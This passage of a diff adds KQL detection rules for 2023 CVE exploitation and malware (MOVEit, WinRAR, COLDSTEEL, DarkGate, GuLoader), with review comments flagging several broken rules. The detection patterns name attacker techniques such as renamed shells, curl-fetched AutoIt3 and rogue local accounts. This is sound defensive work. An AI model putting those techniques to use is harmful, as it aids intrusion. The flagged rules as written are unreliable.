+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-23397/outlook_task_note_reminder_received.kql
@@ -0,0 +1,12 @@
+// Title: Outlook Task/Note Reminder Received
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-05
+// Level: low
+// Description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137, cve.2023-23397, detection.emerging-threats
+// False Positives:
+// - Legitimate reminders received for a task or a note will also trigger this rule.
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Tasks*" or RegistryKey endswith "\\Notes*") and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook*")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-27363/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-27363/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql
new file mode 100644
index 00000000..7b0f4745
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-27363/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql
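Review bot: Every term on the `where` line carries a literal `*` inside an `endswith`, e.g. `RegistryKey endswith "\\Tasks*"`, which can never be true, and the second group (`endswith "\\SOFTWARE\\Microsoft\\Office*" and endswith "\\Outlook*"`) is mutually exclusive even without the asterisks. The Sigma wildcards should translate to `contains`: `(RegistryKey contains "\\Tasks" or RegistryKey contains "\\Notes") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Office" and RegistryKey contains "\\Outlook"`. The existing false-positive note about legitimate reminders still applies after the fix.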
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader
+// Author: Gregory
+// Date: 2023-10-11
+// Level: high
+// Description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.001, cve.2023-27363, detection.emerging-threats
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\FoxitPDFReader.exe" and FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" and FolderPath endswith ".hta"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
new file mode 100644
index 00000000..7dac7d99
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
@@ -0,0 +1,15 @@
+// Title: Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE
+// Author: @kostastsale
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files.
+// MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll.
+// Hunting Opportunity
+// Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, cve.2023-34362, detection.emerging-threats
+// False Positives:
+// - Initial software installation and software updates.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\csc.exe" and InitiatingProcessCommandLine contains "moveitdmz pool" and InitiatingProcessFolderPath endswith "\\w3wp.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql
new file mode 100644
index 00000000..7b2ce655
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-23
+// Level: high
+// Description: Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath endswith "\\wermgr.exe" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\$WinREAgent\\" or FolderPath contains ":\\Windows\\servicing\\LCU\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\" or FolderPath contains ":\\Windows\\SoftwareDistribution\\Download\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql
new file mode 100644
index 00000000..e3ec872b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql
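Review bot: The exclusion `FolderPath contains ":\\Windows\\System32\\"` is a substring match, so it also suppresses a `wermgr.exe` dropped into writable subtrees such as `System32\\Tasks\\` or `System32\\spool\\drivers\\color\\`, which are exactly the "uncommon directory" cases the title is after; if the intent is only to exempt the real binary, `FolderPath endswith ":\\Windows\\System32\\wermgr.exe"` (and the SysWOW64 equivalent) is tighter. If the broad exemption is deliberate because of servicing writes, a comment next to the filter saying so would stop the next reviewer from tightening it.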
@@ -0,0 +1,12 @@
+// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-23
+// Level: high
+// Description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wermgr.exe" and (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "powershell_ise.EXE", "powershell.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql
new file mode 100644
index 00000000..18e47b3f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-23
+// Level: medium
+// Description: Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
+
+DeviceFileEvents
+| where (FolderPath contains ":\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\" and FolderPath endswith "\\Report.wer") and (not((FolderPath contains "\\ReportArchive\\AppCrash_" or FolderPath contains "\\ReportArchive\\AppHang_" or FolderPath contains "\\ReportArchive\\Critical_" or FolderPath contains "\\ReportArchive\\Kernel_" or FolderPath contains "\\ReportArchive\\NonCritical_")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36884/potential_cve_2023_36884_exploitation_dropped_file.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36884/potential_cve_2023_36884_exploitation_dropped_file.kql
new file mode 100644
index 00000000..4556f6f1
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36884/potential_cve_2023_36884_exploitation_dropped_file.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-36884 Exploitation Dropped File
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2023-07-13
+// Level: medium
+// Description: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, cve.2023-36884, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" and FolderPath endswith "\\file001.url" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql
new file mode 100644
index 00000000..cbc6e8f2
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql
@@ -0,0 +1,10 @@
+// Title: CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-30
+// Level: high
+// Description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-38331, detection.emerging-threats
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\WinRAR.exe" and FolderPath contains "\\AppData\\Local\\Temp\\Rar$" and FolderPath matches regex "\\.[a-zA-Z0-9]{1,4} \\."
\ No newline at end of file
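Review bot: The rule metadata names CVE-2023-38331 in the title, description and `cve.2023-38331` tag, while the file is placed under `CVE-2023-38831/`, and the WinRAR child-process rule in the next hunk carries the same disagreement; the directory's CVE-2023-38831 is the identifier published for the WinRAR flaw, so the title, tag and file name appear to be transposed, and a tag search for the directory's CVE will miss both rules. Since these files are generated, the inconsistency presumably originates in the upstream Sigma metadata and is best corrected there (or normalised by the converter from the target directory) rather than patched in the output.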
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql
new file mode 100644
index 00000000..894b4988
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems), Andreas Braathen (mnemonic.io)
+// Date: 2023-08-30
+// Level: high
+// Description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
+// MITRE Tactic: Execution
+// Tags: detection.emerging-threats, attack.execution, attack.t1203, cve.2023-38331
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe"))) and ProcessCommandLine matches regex "\\.[a-zA-Z0-9]{1,4} \\." and ProcessCommandLine contains "\\AppData\\Local\\Temp\\Rar$" and InitiatingProcessFolderPath endswith "\\WinRAR.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-40477/cve_2023_40477_potential_exploitation_rev_file_creation.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-40477/cve_2023_40477_potential_exploitation_rev_file_creation.kql
new file mode 100644
index 00000000..2bec633b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-40477/cve_2023_40477_potential_exploitation_rev_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2023-40477 Potential Exploitation - .REV File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-31
+// Level: low
+// Description: Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-40477, detection.emerging-threats
+// False Positives:
+// - Legitimate extraction of multipart or recovery volumes ZIP files
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\WinRAR.exe") and FolderPath endswith ".rev"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql b/KQL/rules-emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql
new file mode 100644
index 00000000..34ece3d8
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql
@@ -0,0 +1,10 @@
+// Title: Potential Exploitation Attempt Of Undocumented WindowsServer RCE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
+// Date: 2023-01-21
+// Level: high
+// Description: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-k DHCPServer" and FolderPath endswith "\\svchost.exe" and InitiatingProcessCommandLine contains "-k DHCPServer" and InitiatingProcessFolderPath endswith "\\svchost.exe" and (AccountName contains "NETWORK SERVICE" or AccountName contains "NETZWERKDIENST" or AccountName contains "SERVIZIO DI RETE" or AccountName contains "SERVICIO DE RED")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_anonymous_user_process_execution.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_anonymous_user_process_execution.kql
new file mode 100644
index 00000000..fa35da9f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_anonymous_user_process_execution.kql
@@ -0,0 +1,10 @@
+// Title: COLDSTEEL RAT Anonymous User Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-30
+// Level: high
+// Description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath contains "\\Windows\\System32\\" or InitiatingProcessFolderPath contains "\\AppData\\") and AccountName contains "ANONYMOUS"
\ No newline at end of file
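Review bot: In the COLDSTEEL anonymous-user rule, `AccountName contains "ANONYMOUS"` is a case-insensitive substring test that also matches the built-in `ANONYMOUS LOGON` identity, so any process running under that account from `System32` or `AppData` may raise this high-severity alert, and the rule has no False Positives section to warn the analyst. The description says the user is "called ANONYMOUS", which suggests an exact comparison, `AccountName =~ "ANONYMOUS"`, or at least an explicit exclusion of `ANONYMOUS LOGON`, would keep the intent with less noise.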
diff --git a/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_cleanup_command_execution.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_cleanup_command_execution.kql
new file mode 100644
index 00000000..d8fadd66
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_cleanup_command_execution.kql
@@ -0,0 +1,12 @@
+// Title: COLDSTEEL RAT Cleanup Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-30
+// Level: critical
+// Description: Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "UpdateDriverForPlugAndPlayDevicesW" or ProcessCommandLine contains "ServiceMain" or ProcessCommandLine contains "DiUninstallDevice") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessCommandLine contains " -k msupdate" or InitiatingProcessCommandLine contains " -k msupdate2" or InitiatingProcessCommandLine contains " -k alg") and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_service_persistence_execution.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_service_persistence_execution.kql
new file mode 100644
index 00000000..eb01a484
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_service_persistence_execution.kql
@@ -0,0 +1,12 @@
+// Title: COLDSTEEL RAT Service Persistence Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-04-30
+// Level: critical
+// Description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " -k msupdate" or ProcessCommandLine endswith " -k msupdate2" or ProcessCommandLine endswith " -k alg") and FolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_creation.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_creation.kql
new file mode 100644
index 00000000..cb9cc6c3
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_creation.kql
@@ -0,0 +1,10 @@
+// Title: Potential COLDSTEEL Persistence Service DLL Creation
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-04-30
+// Level: high
+// Description: Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath endswith "\\AppData\\Roaming\\newdev.dll" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_load.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_load.kql
new file mode 100644
index 00000000..5053c50b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_persistence_service_dll_load.kql
@@ -0,0 +1,12 @@
+// Title: Potential COLDSTEEL Persistence Service DLL Load
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-02
+// Level: high
+// Description: Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\AppData\\Roaming\\newdev.dll" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_file_indicators.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_file_indicators.kql
new file mode 100644
index 00000000..e899daa3
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_file_indicators.kql
@@ -0,0 +1,10 @@
+// Title: Potential COLDSTEEL RAT File Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-30
+// Level: high
+// Description: Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\users\\public\\Documents\\dllhost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_windows_user_creation.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_windows_user_creation.kql
new file mode 100644
index 00000000..1d27b967
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/potential_coldsteel_rat_windows_user_creation.kql
@@ -0,0 +1,10 @@
+// Title: Potential COLDSTEEL RAT Windows User Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-02
+// Level: high
+// Description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "ANONYMOUS" or RegistryValueData contains "_DomainUser_") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-" and RegistryKey contains "\\ProfileImagePath")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_execution_parameters.kql b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_execution_parameters.kql
new file mode 100644
index 00000000..92b68a1a
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_execution_parameters.kql
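Review bot: `RegistryKey contains "\\ProfileImagePath"` will not match in `DeviceRegistryEvents`: `ProfileImagePath` is a registry value name, and this table reports value names in `RegistryValueName` rather than as a suffix of `RegistryKey`, so the `and` makes the whole rule silent. Replacing that clause with `RegistryValueName =~ "ProfileImagePath"` preserves the intent. This looks like a general mapping gap for Sigma `TargetObject` paths that end in a value name, so other registry conversions produced by the same tool are probably affected in the same way.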
@@ -0,0 +1,14 @@
+// Title: DarkGate - Autoit3.EXE Execution Parameters
+// Author: Micah Babinski
+// Date: 2023-10-15
+// Level: high
+// Description: Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within
+// the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate
+// command-and-control server.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\KeyScramblerLogon.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe") and (FolderPath endswith "\\Autoit3.exe" or ProcessVersionInfoOriginalFileName =~ "AutoIt3.exe")) and (not((FolderPath endswith ":\\Program Files (x86)\\AutoIt3\\AutoIt3.exe" or FolderPath endswith ":\\Program Files\\AutoIt3\\AutoIt3.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
new file mode 100644
index 00000000..b347ed04
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
@@ -0,0 +1,13 @@
+// Title: DarkGate - Autoit3.EXE File Creation By Uncommon Process
+// Author: Micah Babinski
+// Date: 2023-10-15
+// Level: medium
+// Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe.
+// This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs
+// process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other
+// processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.t1105, attack.t1059, detection.emerging-threats
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\Autoit3.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\KeyScramblerLogon.exe" or InitiatingProcessFolderPath endswith "\\wmprph.exe") and FolderPath endswith "\\Autoit3.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_user_created_via_net_exe.kql b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_user_created_via_net_exe.kql
new file mode 100644
index 00000000..34c15e9f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/DarkGate/darkgate_user_created_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: DarkGate - User Created Via Net.EXE
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-08-27
+// Level: high
+// Description: Detects creation of local users via the net.exe command with the name of "DarkGate"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "DarkGate" and ProcessCommandLine contains "SafeMode") and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Griffon/griffon_malware_attack_pattern.kql b/KQL/rules-emerging-threats/2023/Malware/Griffon/griffon_malware_attack_pattern.kql
new file mode 100644
index 00000000..1a12b33a
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Griffon/griffon_malware_attack_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Griffon Malware Attack Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-09
+// Level: critical
+// Description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\local\\temp\\" and ProcessCommandLine contains "//b /e:jscript" and ProcessCommandLine contains ".txt"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/GuLoader/injected_browser_process_spawning_rundll32_guloader_activity.kql b/KQL/rules-emerging-threats/2023/Malware/GuLoader/injected_browser_process_spawning_rundll32_guloader_activity.kql
new file mode 100644
index 00000000..47eabde4
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/GuLoader/injected_browser_process_spawning_rundll32_guloader_activity.kql
@@ -0,0 +1,13 @@
+// Title: Injected Browser Process Spawning Rundll32 - GuLoader Activity
+// Author: @kostastsale
+// Date: 2023-08-07
+// Level: high
+// Description: Detects the execution of installed GuLoader malware on the host.
+// GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "\\rundll32.exe" and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/IcedID/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql b/KQL/rules-emerging-threats/2023/Malware/IcedID/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql
new file mode 100644
index 00000000..ce83edc5
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/IcedID/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql
@@ -0,0 +1,10 @@
+// Title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-31
+// Level: high
+// Description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID
+// MITRE Tactic: Defense Evasion
